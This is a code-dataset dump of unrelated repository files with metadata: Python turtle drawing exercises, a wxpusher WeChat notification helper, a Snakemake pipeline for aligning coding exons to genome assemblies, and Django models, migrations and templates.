"text": "import turtle\r\nwn=turtle.Screen()\r\nt1=turtle.Turtle()\r\ndef giyuk(size):\r\n t1.fd(size)\r\n t1.rt(90)\r\n t1.fd(size)\r\nt1.home()\r\nt1.clear()\r\nturnby=45\r\nsize=100\r\noldpos=t1.pos()\r\noldhead=t1.heading()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\nt1.setheading(oldhead+turnby)\r\nt1.pendown()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\nt1.setheading(oldhead+turnby*2)\r\nt1.pendown()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\nt1.setheading(oldhead+turnby*3)\r\nt1.pendown()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\nt1.setheading(oldhead+turnby*4)\r\nt1.pendown()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\nt1.setheading(oldhead+turnby*5)\r\nt1.pendown()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\nt1.setheading(oldhead+turnby*6)\r\nt1.pendown()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\nt1.setheading(oldhead+turnby*7)\r\nt1.pendown()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\n"
},
{
"alpha_fraction": 0.3228120505809784,
"alphanum_fraction": 0.559540867805481,
"avg_line_length": 9.73109245300293,
"blob_id": "c3805cae477100df3a117184ae89fbdd432e9321",
"content_id": "a797da3bb1f7e853a905454331521cfccca4da08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1396,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 119,
"path": "/ct_2017/maze201710920.py",
"repo_name": "nohjune/ct_201710920",
"src_encoding": "UTF-8",
"text": "import turtle\r\nwn=turtle.Screen()\r\nwn.bgpic(\"C:\\\\Users\\\\400T6B\\\\Downloads\\\\20 by 20 orthogonal maze.gif\")\r\nt1=turtle.Turtle()\r\nt1.speed(1)\r\nt1.goto(-5,155)\r\nt1.fd(10)\r\nt1.fd(10)\r\nt1.rt(90)\r\nt1.clear()\r\nt1.goto(-5,155)\r\nt1.clear()\r\nt1.fd(5)\r\nt1.lt(90)\r\nt1.fd(10)\r\nt1.fd(5)\r\nt1.rt(90)\r\nt1.fd(10)\r\nt1.fd(5)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.fd(2)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.fd(5)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.fd(15)\r\nt1.fd(3)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.fd(3)\r\nt1.lt(90)\r\nt1.fd(20)\r\nt1.fd(5)\r\nt1.fd(5)\r\nt1.rt(90)\r\nt1.fd(20)\r\nt1.fd(20)\r\nt1.rt(90)\r\nt1.rt(90)\r\nt1.fd(10)\r\nt1.lt(90)\r\nt1.fd(20)\r\nt1.fd(20)\r\nt1.lt(90)\r\nt1.fd(25)\r\nt1.fd(5)\r\nt1.fd(2)\r\nt1.fd(2)\r\nt1.lt(90)\r\nt1.fd(30)\r\nt1.fd(5)\r\nt1.fd(5)\r\nt1.lt(90)\r\nt1.fd(10)\r\nt1.fd(5)\r\nt1.rt(90)\r\nt1.fd(10)\r\nt1.fd(5)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.lt(90)\r\nt1.fd(30)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.fd(7)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.lt(90)\r\nt1.fd(60)\r\nt1.rt(90)\r\nt1.fd(45)\r\nt1.fd(15)\r\nt1.lt(90)\r\nt1.fd(30)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.lt(90)\r\nt1.fd(30)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.fd(5)\r\nt1.lt(90)\r\nt1.fd(30)\r\nt1.fd(10)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(30)\r\nt1.fd(5)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.fd(5)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(30)\r\nwn.exitonclick()"
},
{
"alpha_fraction": 0.37555229663848877,
"alphanum_fraction": 0.6185566782951355,
"avg_line_length": 11.897958755493164,
"blob_id": "3bd47cccd740be75b56c9665742e1500af678235",
"content_id": "45273b4ac215454fb0c6510b0b5a9755051ebec1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 681,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 49,
"path": "/ct_2017/wk6_201710920_name.py",
"repo_name": "nohjune/ct_201710920",
"src_encoding": "UTF-8",
"text": "import turtle\r\nt1=turtle.Turtle()\r\nwn=turtle.Screen()\r\nt1.shape(\"turtle\")\r\nt1.penup()\r\nt1.goto(-300,300)\r\nt1.rt(90)\r\nt1.pendown()\r\nt1.fd(100)\r\nt1.lt(90)\r\nt1.fd(200)\r\nt1.goto(-200,200)\r\nt1.rt(90)\r\nt1.fd(100)\r\nt1.rt(90)\r\nt1.fd(100)\r\nt1.pos()\r\nt1.goto(-100,100)\r\nt1.penup()\r\nt1.goto(100,300)\r\nt1.pendown()\r\nt1.rt(90)\r\nt1.rt(90)\r\nt1.fd(200)\r\nt1.pos()\r\nt1.goto(200,300)\r\nt1.goto(100,200)\r\nt1.goto(200,300)\r\nt1.goto(300,200)\r\nt1.penup()\r\nt1.goto(50,150)\r\nt1.pendown()\r\nt1.fd(250)\r\nt1.fd(50)\r\nt1.pos()\r\nt1.goto(175,150)\r\nt1.goto(200,150)\r\nt1.rt(90)\r\nt1.fd(50)\r\nt1.penup()\r\nt1.pos()\r\nt1.goto(100,50)\r\nt1.goto(100,100)\r\nt1.pendown()\r\nt1.fd(100)\r\nt1.lt(90)\r\nt1.fd(200)\r\n\r\nwn.exitonclick()"
}
] | 7 |
lun3322/smzdm_bot | https://github.com/lun3322/smzdm_bot | 6d7245d83c54c175461c87cb41ce8568391768b6 | b45bfc4252aacae1b59269d283839876d965f4b3 | 42982e65f368fbae9858d82ea2391c0673212daf | refs/heads/main | 2023-05-31T07:23:58.803952 | 2021-07-05T03:21:06 | 2021-07-05T03:21:06 | 340,245,795 | 0 | 0 | null | 2021-02-19T03:16:55 | 2021-02-18T12:13:28 | 2021-02-15T09:02:03 | null | [
{
"alpha_fraction": 0.4740346074104309,
"alphanum_fraction": 0.47536617517471313,
"avg_line_length": 21.40625,
"blob_id": "185f62403eb3049f7efba7420bec881da88d2be2",
"content_id": "12a36daeb384dc21e0cb4aaebe0fd2baa69ecc20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 771,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 32,
"path": "/utils/serverchan_push.py",
"repo_name": "lun3322/smzdm_bot",
"src_encoding": "UTF-8",
"text": "\r\nimport config\r\nimport requests\r\n\r\n\r\ndef push_to_wechat(text, desp, appToken, uid):\r\n \"\"\"\r\n 通过wxpusher将消息推送到微信\r\n \"\"\"\r\n url = f'http://wxpusher.zjiecode.com/api/send/message'\r\n session = requests.Session()\r\n data = {\r\n \"appToken\": appToken,\r\n \"content\": desp,\r\n \"summary\": text,\r\n \"contentType\": 1,\r\n \"topicIds\": [],\r\n \"uids\": [\r\n uid\r\n ],\r\n }\r\n headers = {\r\n 'Content-Type': 'application/json'\r\n }\r\n resp = session.post(url, json=data, headers=headers)\r\n return resp.json()\r\n\r\n\r\nif __name__ == '__main__':\r\n resp = push_to_wechat(text='test', desp='hi',\r\n appToken='',\r\n uid='')\r\n print(resp)\r\n"
}
] | 1 |
MartinGildea/tutorial2_primeFactor_competition | https://github.com/MartinGildea/tutorial2_primeFactor_competition | f629231f8398077b1b58904be60b385dea82242b | 3c2bb27d7964d88a78ccdf5eace2707007322fa0 | b623bef8519a63613abede526c1dbb43c2856494 | refs/heads/master | 2021-07-13T02:31:23.793338 | 2017-10-08T15:56:13 | 2017-10-08T15:56:13 | 105,880,631 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6248725652694702,
"alphanum_fraction": 0.6472986936569214,
"avg_line_length": 39.875,
"blob_id": "82d35b1f595648d45986f0d94fe041baf8538e5b",
"content_id": "04e0560b3645241f1516fdadaf3761c37fd6cce4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 981,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 24,
"path": "/martingildea_tutorial2_competition.py",
"repo_name": "MartinGildea/tutorial2_primeFactor_competition",
"src_encoding": "UTF-8",
"text": "# primeFactors.py\n# import test code\nfrom lab2Test import speedTestFun\n# --------------------------------\n# primeFactors()\n# input: A positive integer n (e.g. 19162234)\n# output: A list of the prime factors of n with multiplicity (e.g. [2, 7, 7, 13, 13, 13, 89])\n# method: Divide n by all possible integers in increasing numerical order, which will naturally eliminate\n# non-prime numbers.\n# --------------------------------\ndef primeFactors(n):\n primeList = [] #primeList is the list of all primeFactors of the target number\n primeDivisor = 2 #primeDivisor is a variable that will be added to the list if it can divide the target number without a remainder.\n while primeDivisor * primeDivisor <= n:\n if n % primeDivisor:\n primeDivisor = primeDivisor + 1\n else:\n n = n / primeDivisor\n primeList.append(primeDivisor)\n primeList.append(n)\n return primeList\n\n#testFun(primeFactors)\nspeedTestFun(primeFactors)\n"
}
] | 1 |
WatsonLab/sm_assemblies | https://github.com/WatsonLab/sm_assemblies | 0134a7d56f0dd708e13a7294b6c3294034a21ea5 | 1e8fe0518c4f89b4648b6e1d56dff78b6249bc1c | 35259beef8459ca2af3a8f5047af59f8c41efb01 | refs/heads/master | 2021-05-02T09:51:35.570992 | 2020-03-03T21:34:24 | 2020-03-03T21:34:24 | 120,784,949 | 8 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6990172266960144,
"alphanum_fraction": 0.7567567825317383,
"avg_line_length": 24.40625,
"blob_id": "e992cc7851b53c20e9baed322e5cac48199e6bf9",
"content_id": "c94efe9fc6360e169336a6c566bf9ab58ac6e010",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1628,
"license_type": "no_license",
"max_line_length": 230,
"num_lines": 64,
"path": "/README.md",
"repo_name": "WatsonLab/sm_assemblies",
"src_encoding": "UTF-8",
"text": "# sm_assemblies\nAnalysis of protein coding exons in single molecule assemblies\n\n# dependencies\n* Snakemake\n* BioPython\n* conda\n* splign (https://www.ncbi.nlm.nih.gov/sutils/splign/splign.cgi?textpage=downloads)\n* Python 3.5\n* BLAT\n* wget\n* samtools\n\n# clone this repo\n```\ngit clone https://github.com/WatsonLab/sm_assemblies.git\ncd sm_assemblies\n```\n\n# download genomes\n```\n/bin/bash scripts/download.sh\ngunzip *.fasta.gz\nmkdir genomes\nmv *.fasta genomes\n```\n\n# run\n```\nsnakemake --use-conda\n```\n\n## parse splign output\n\nPerl script alnparse.pl can be used to summarise the splign output. \n\nThe way the pipeline stores splign results is in a \"one query, one subject\" file i.e. \"ENST00000052569.10.OCVW01001666.1.aln\" - this would be all of the splign hits from ENST00000052569.10 (query) against OCVW01001666.1 (subject).\n\nTo summarise the best hit from a single alignment file, run the script like this:\n\n```sh\nperl scripts/alnparse.pl ENST00000052569.10.OCVW01001666.1.aln\n```\n\nHowever, often we want to consider the hits against multiple subjects in order to find the best hit. In this case, we run it like this:\n\n```sh\nperl scripts/alnparse.pl <(cat ENST00000052569.10.*.aln)\n```\n\nThis will find the best hit from alignments of ENST00000052569.10 against all subjects it has been aligned against.\n\nThe output is tab-delimited:\n* query name\n* hit name\n* query start\n* length of alignment\n* number of mismatch events\n* number of bases in mismatch events\n* number of insertion events\n* number of bases in insertion events\n* number of deletion events\n* number of bases in deletion events\n* protein sequence of aligned bases\n\n\n"
},
{
"alpha_fraction": 0.6173613667488098,
"alphanum_fraction": 0.6264669895172119,
"avg_line_length": 33.55244827270508,
"blob_id": "1d5582cd94f1796313ab1949df15cb5baef51083",
"content_id": "e29f09a06288f58f0e9be59432c2d9859e39e6ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4942,
"license_type": "no_license",
"max_line_length": 668,
"num_lines": 143,
"path": "/Snakefile",
"repo_name": "WatsonLab/sm_assemblies",
"src_encoding": "UTF-8",
"text": "shell.executable(\"/bin/bash\")\nshell.prefix(\"source $HOME/.bashrc; \")\n\nfrom Bio import SeqIO\nimport sys\nimport os\n\nIDS, = glob_wildcards(\"genomes/{id}.fasta\")\n\nrule all:\n\tinput: expand(\"{sample}.splign.finished.txt\", sample=IDS), expand(\"genomes/{sample}.fasta.fai\", sample=IDS), expand(\"{sample}.transcript_ids.txt\", sample=IDS), expand(\"blat_{sample}.tsv\", sample=IDS), expand(\"blat_{sample}.blast\", sample=IDS), \"unique_transcript_ids.txt\"\n\nrule coding_transcripts_download:\n\toutput: \"protein_coding_transcripts.fasta\"\n\tshell:\n\t\t'''\n\t\twget -O protein_coding_transcripts.fasta.gz ftp://ftp.ensembl.org/pub/release-92/fasta/homo_sapiens/cds/Homo_sapiens.GRCh38.cds.all.fa.gz\n\t\tgunzip protein_coding_transcripts.fasta.gz\n\t\tsamtools faidx protein_coding_transcripts.fasta\n\t\t'''\n\nrule exons_download:\n output: \"protein_coding_exons.fasta\"\n shell: \"wget -O protein_coding_exons.fasta 'http://www.ensembl.org/biomart/martservice?query=<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><!DOCTYPE Query><Query virtualSchemaName = \\\"default\\\" formatter = \\\"FASTA\\\" header = \\\"0\\\" uniqueRows = \\\"1\\\" count = \\\"\\\" datasetConfigVersion = \\\"0.6\\\" ><Dataset name = \\\"hsapiens_gene_ensembl\\\" interface = \\\"default\\\" ><Filter name = \\\"biotype\\\" value = \\\"protein_coding\\\"/><Filter name = \\\"transcript_biotype\\\" value = \\\"protein_coding\\\"/><Attribute name = \\\"ensembl_gene_id\\\" /><Attribute name = \\\"ensembl_transcript_id\\\" /><Attribute name = \\\"gene_exon\\\" /><Attribute name = \\\"ensembl_exon_id\\\" /></Dataset></Query>'\"\n\nrule length_filter:\n input: \"protein_coding_exons.fasta\"\n output: \"protein_coding_exons.filtered.fasta\"\n params:\n len=300\n run:\n input_seq_iterator = SeqIO.parse(open(input[0], \"rU\"), \"fasta\")\n short_seq_iterator = (record for record in input_seq_iterator \\\n if len(record.seq) > int(300))\n\n output_handle = open(output[0], \"w\")\n SeqIO.write(short_seq_iterator, output_handle, \"fasta\")\n output_handle.close()\n\n\nrule make_faidx:\n\tinput: \"genomes/{id}.fasta\"\n\toutput: \"genomes/{id}.fasta.fai\"\n\tshell: \"samtools faidx {input}\"\n\nrule splign:\n\tinput:\n\t\tidl=\"trouble_list.txt\",\n\t\tblo=\"blat_{id}.blast\",\n\t\tass=\"genomes/{id}.fasta\",\n\t\tfai=\"genomes/{id}.fasta.fai\"\n\toutput: \"{id}.splign.finished.txt\"\n\tparams: dir=\"{id}.splign\"\n\tconda: \"envs/bioperl.yml\"\n\tshell:\n\t\t\"\"\"\n\t\tperl scripts/run_splign.pl {input.idl} {input.blo} {input.ass} {params.dir} && touch {output}\n\t\t\"\"\"\n\nrule make_ooc:\n\tinput: \"genomes/{id}.fasta\"\n\toutput: \"{id}.ooc\"\n\tshell: \"blat {input} /dev/null /dev/null -makeOoc={output} -repMatch=1024\"\n\nrule blat:\n\tinput:\n\t\tgen=\"genomes/{id}.fasta\",\n\t\tooc=\"{id}.ooc\",\n\t\texn=\"protein_coding_exons.filtered.fasta\"\n\toutput: \"blat_{id}.psl\"\n\tshell: \"blat {input.gen} {input.exn} -out=blast9 -ooc={input.ooc} {output}\"\n\nrule blat_cdna:\n\tinput:\n\t\tgen=\"genomes/{id}.fasta\",\n\t\tooc=\"{id}.ooc\",\n\t\tcdn=\"protein_coding_transcripts.fasta\"\n\toutput: \"blat_{id}.blast\"\n\tshell: \"blat {input.gen} {input.cdn} -out=blast -ooc={input.ooc} {output}\"\n\nrule unique_tid:\n\tinput: \"protein_coding_exons.filtered.fasta\"\n\toutput: \"unique_transcript_ids.txt\"\n\tshell: \"cat {input} | grep '>' | awk -F'|' '{{print $2}}' | perl -e 'while(<>) {{print join(\\\"\\\\n\\\", split(\\\";\\\"))}}' | sort | uniq > {output}\"\n\nrule get_list:\n\tinput: 
\n\t\tuti=\"unique_transcript_ids.txt\",\n\t\trep=\"blat_{id}.tsv\"\n\toutput: \"{id}.transcript_ids.txt\"\n\tparams:\n\t\ttmp=\"{id}\"\n\tshell:\n\t\t\"\"\"\n\t\tcat {input.rep} | awk '$6>0' | awk -F'|' '{{print $2}}' | perl -e 'while(<>) {{print join(\\\"\\\\n\\\", split(\\\";\\\"))}}' | sort | uniq > {params.tmp}.faulty\n\t\tcat {input.rep} | awk -F'|' '{{print $2}}' | perl -e 'while(<>) {{print join(\\\"\\\\n\\\", split(\\\";\\\"))}}' | sort | uniq > {params.tmp}.allhits\n\t\tcomm {params.tmp}.allhits {input.uti} | awk -F\\\"\\\\t\\\" '$2~/ENST/ {{print $2}}' > {params.tmp}.missing\n\t\tcat {params.tmp}.faulty {params.tmp}.missing > {output}\n\t\t\"\"\"\n\nrule combine_lists:\n\tinput: expand(\"{allids}.transcript_ids.txt\", allids=IDS)\n\toutput: \"trouble_list.txt\"\n\tshell: \"cat {input} | sort | uniq > {output}\"\n\nrule report:\n\tinput: \"blat_{id}.psl\", \"protein_coding_exons.filtered.fasta\"\n\toutput: \"blat_{id}.tsv\"\n\trun:\n\t\tseq_length = dict()\n\n \t\twith open(input[1], \"rU\") as handle:\n\t\t\tfor record in SeqIO.parse(handle, \"fasta\"):\n\t\t\t\tseq_length[record.id] = len(record.seq)\n\n\t\t# open the input file\n\t\tpsl_file = open(input[0], mode=\"r\")\n\n\t\ttop_hits = dict()\n\n\t\t# open the output file\n\t\tf = open(output[0], 'w')\n\n\t\t# iterate over file\n\t\tfor row in psl_file:\n\n\t\t\tif row.startswith(\"#\"):\n\t\t\t\tcontinue\n \n\t\t\t# split on whitespace\n\t\t\tarr = row.strip().split()\n\n\t\t\tif arr[0] in top_hits:\n\t\t\t\tcontinue\n\n\t\t\ttop_hits[arr[0]] = 1\n\t\t\t\n\t\t\tif arr[0] in seq_length.keys():\n\t\t\t\tprint(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\" % (arr[0], seq_length[arr[0]], arr[2], arr[3], arr[4], arr[5]), file=f)\n\t\t\telse:\n\t\t\t\tprint(\"This key isn't in seq_length: \", arr[0], end='\\n\\n')\n\n\t\tf.close()\n\n"
},
{
"alpha_fraction": 0.6181262731552124,
"alphanum_fraction": 0.7841140627861023,
"avg_line_length": 56.588233947753906,
"blob_id": "868179208f5f3bb6c3b05c57e11d695fe99ef750",
"content_id": "b9696cbc6dfea6a2e1f53b8e1243e861ae63410c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 982,
"license_type": "no_license",
"max_line_length": 221,
"num_lines": 17,
"path": "/scripts/download.sh",
"repo_name": "WatsonLab/sm_assemblies",
"src_encoding": "UTF-8",
"text": "# GRCh38\nwget -O grch38.fasta.gz ftp://ftp.ensembl.org/pub/release-91/fasta/homo_sapiens/dna/Homo_sapiens.GRCh38.dna.primary_assembly.fa.gz\n\n# PacBio 15X\nwget -O pacbio.fasta.gz ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/001/013/985/GCA_001013985.1_ASM101398v1/GCA_001013985.1_ASM101398v1_genomic.fna.gz\n\n# nanopore\nwget -O nanopore.fasta.gz ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/900/232/925/GCA_900232925.1_Nanopore-only_assembly_with_Illumina_polishing/GCA_900232925.1_Nanopore-only_assembly_with_Illumina_polishing_genomic.fna.gz\n\n# Pacbio CHM1\nwget http://gembox.cbcb.umd.edu/shared/canu/quiver/canu/chm1.round2.fasta\n\n# Illumina CHM1\nwget -O illumina_chm1.fasta.gz ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/000/306/695/GCA_000306695.2_CHM1_1.1/GCA_000306695.2_CHM1_1.1_genomic.fna.gz\n\n# Illumina NA12878\nwget -O illumina_na12878.fasta.gz ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/000/185/165/GCA_000185165.1_HsapALLPATHS1/GCA_000185165.1_HsapALLPATHS1_genomic.fna.gz\n\n\n\n"
}
] | 3 |
kunkunkun1/myhome | https://github.com/kunkunkun1/myhome | a6d79a4998fd9cdaf450433867c7e98cdd677ac2 | 9f6005418695a6d2096cd393f7a4a55bff2a5109 | cef2542617b9462bd4059d46016312d1763d9e36 | refs/heads/master | 2020-03-29T13:19:28.594085 | 2018-09-30T06:32:15 | 2018-09-30T06:32:15 | 149,952,368 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.49882903695106506,
"alphanum_fraction": 0.5761123895645142,
"avg_line_length": 22.72222137451172,
"blob_id": "a4eb5ebdfc52d294bedc0e13e5852b4c1982ade8",
"content_id": "ab9907d25f3f59f6328d3c722493934c116f1b8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 18,
"path": "/dbmodels/migrations/0003_auto_20180917_1906.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-17 11:06\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0002_auto_20180917_1902'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='userinfo',\n name='sex',\n field=models.IntegerField(blank=True, choices=[(1, '男'), (2, '女')], null=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.4959999918937683,
"alphanum_fraction": 0.5786666870117188,
"avg_line_length": 19.83333396911621,
"blob_id": "a9c52c39dc2251cf7c75f5c1c73f324e2db451ef",
"content_id": "2f8a4cb08899fb4b3d729eef758eeb734f0a04cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 375,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 18,
"path": "/dbmodels/migrations/0005_auto_20180917_1940.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.0.6 on 2018-09-17 11:40\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dbmodels', '0004_auto_20180917_1931'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='userinfo',\n old_name='login_account',\n new_name='nikename',\n ),\n ]\n"
},
{
"alpha_fraction": 0.33246752619743347,
"alphanum_fraction": 0.3380952477455139,
"avg_line_length": 35.650794982910156,
"blob_id": "730ef6c592f76ce6a9df4e4c7baafcca3aa90ea6",
"content_id": "4b98920bcadc517433411e4fb8bcd517cab8a988",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 2322,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 63,
"path": "/templates/create.html",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "{% extends 'base/indexbase.html' %}\n{% load staticfiles %}\n\n{% block title %}\n 增加\n{% endblock %}\n\n\n\n{% block content %}\n\n <div id=\"content-container\">\n <div id=\"page-head\">\n <ol class=\"breadcrumb\">\n <li><a href=\"{% url 'web:index' %}\"><i class=\"demo-pli-home\"></i></a></li>\n <li><a href=\"{% url 'web:transaction_changelist' %}\"><i class=\"pli-open-book\"></i></a></li>\n <li><i class=\"pli-diploma-2\"></i></li>\n </ol>\n </div>\n\n <div>\n <div class=\"col-sm-12\">\n <div class=\"panel\">\n <div class=\"panel-heading\">\n <h3 class=\"panel-title\">新增</h3>\n </div>\n <!--Bordered Table-->\n <!--===================================================-->\n <form class=\"form-horizontal\" method=\"post\">\n {% csrf_token %}\n <div class=\"panel-body\">\n {% for i in form %}\n {{ i.errors.0 }}\n <div class=\"form-group\">\n <label class=\"col-sm-3 control-label\">{{ i.label_tag }}</label>\n <div class=\"col-sm-9\">\n {{ i }}\n </div>\n </div>\n {% endfor %}\n </div>\n <div class=\"panel-footer text-right\">\n <button class=\"btn btn-success\" type=\"submit\">提交</button>\n </div>\n </form>\n </div>\n </div>\n </div>\n\n <div class=\"text-center\">\n <ul class=\"pagination mar-no\">\n <li class=\"disabled\"><a class=\"demo-pli-arrow-left\" href=\"#\"></a></li>\n <li class=\"active\"><a href=\"#\">1</a></li>\n <li><a href=\"#\">2</a></li>\n <li><a href=\"#\">3</a></li>\n <li><a href=\"#\">4</a></li>\n <li><a href=\"#\">5</a></li>\n <li><a class=\"demo-pli-arrow-right\" href=\"#\"></a></li>\n </ul>\n </div>\n </div>\n\n{% endblock %}\n\n"
},
{
"alpha_fraction": 0.4729960262775421,
"alphanum_fraction": 0.5548607110977173,
"avg_line_length": 25.25373077392578,
"blob_id": "be88e3694f1cc2937550c53cb4806f82c174ac22",
"content_id": "14ce8046cdfb40a5c9ec531fd55396c9272487b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1765,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 67,
"path": "/utils.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "a = {\n\t\t'iType': '龟丞相',\n\t\t'iHp': 397,\n\t\t'iMp': 244,\n\t\t'iAtt_all': 125,\n\t\t'iDef_All': 176,\n\t\t'iDex_All': 63,\n\t\t'iMagDef_all': 125,\n\t\t'life': 9609,\n\t\t'yuanxiao': 0,\n\t\t'lianshou': 0,\n\t\t'left_qlxl': 7,\n\t\t'iGrade': 29,\n\t\t'iCor_all': 42,\n\t\t'iMag_all': 73,\n\t\t'iStr_all': 49,\n\t\t'iRes_all': 69,\n\t\t'iSpe_all': 78,\n\t\t'iPoint': 0,\n\t\t'grow': 1.049,\n\t\t'ruyidan': 0,\n\t\t'iBaobao': 0,\n\t\t'att': 797,\n\t\t'def': 1308,\n\t\t'hp': 4782,\n\t\t'mp': 1821,\n\t\t'spe': 810,\n\t\t'dod': 881,\n\t\t'qianjinlu': 0,\n\t\t'lx': 0,\n\t\t'pet_icon': 'https://cbg-xyq.res.netease.com/images/pets/small/102064.gif',\n\t\t'genius': 0,\n\t\t'genius_skill': {},\n\t\t'skill_list': [{\n\t\t\t'icon': 'https://cbg-xyq.res.netease.com/images/pet_child_skill/0313.gif',\n\t\t\t'skill_type': '313',\n\t\t\t'level': 1\n\t\t}, {\n\t\t\t'icon': 'https://cbg-xyq.res.netease.com/images/pet_child_skill/0430.gif',\n\t\t\t'skill_type': '430',\n\t\t\t'level': 1\n\t\t}, {\n\t\t\t'icon': 'https://cbg-xyq.res.netease.com/images/pet_child_skill/0332.gif',\n\t\t\t'skill_type': '332',\n\t\t\t'level': 1\n\t\t}, {\n\t\t\t'icon': 'https://cbg-xyq.res.netease.com/images/pet_child_skill/0328.gif',\n\t\t\t'skill_type': '328',\n\t\t\t'level': 1\n\t\t}, {\n\t\t\t'icon': 'https://cbg-xyq.res.netease.com/images/pet_child_skill/0426.gif',\n\t\t\t'skill_type': '426',\n\t\t\t'level': 1\n\t\t}],\n\t\t'all_skill': '313|430|332|328|426',\n\t\t'all_skills': ['313', '430', '332', '328', '426'],\n\t\t'equip_list': [None, None, None],\n\t\t'neidan': []\n\t}\n\nif __name__ == '__main__':\n for key,value in a.items():\n if isinstance(value,str):\n s = \"{key} = models.CharField(verbose_name='',max_length={length},null=True,blank=True)\".format(key=key,length=len(value*2))\n elif isinstance(value,int):\n s = \"{key} = models.IntegerField(verbose_name='',null=True,blank=True)\".format(key=key)\n print(s)\n"
},
{
"alpha_fraction": 0.5921273231506348,
"alphanum_fraction": 0.5946398377418518,
"avg_line_length": 31.2702693939209,
"blob_id": "d54cde69358f860433bd40605d9b29e6a2dd2095",
"content_id": "7db0a3b7f8f2cec18561dfc9c761f564143da424",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1194,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 37,
"path": "/dbmodels/manager.py",
"repo_name": "kunkunkun1/myhome",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass IndexManager(models.Manager):\n def get_queryset_stat(self):\n return super().get_queryset().filter(stat=1)\n\n\nclass ShowImgManager(IndexManager):\n def get_slider(self):\n return self.get_queryset_stat().filter(img_type=0,\n transcation__stat=1).values(\n 'transcation__img').order_by(\n '-top','-transcation__create_time')\n\n\nclass RightNavManager(IndexManager):\n def get_title(self):\n return self.get_queryset_stat().values('title','icon').order_by('pk')\n\nclass MenuManager(IndexManager):\n def get_menu(self):\n parent_list = self.get_queryset_stat().filter(parent_menu__isnull=True).order_by('pk')\n\n result = []\n for parent in parent_list:\n data = {}\n data['title'] = parent.title\n data['menu'] = list(parent.child.values('id','title','url'))\n\n result.append(data)\n\n return result\n\n\nclass 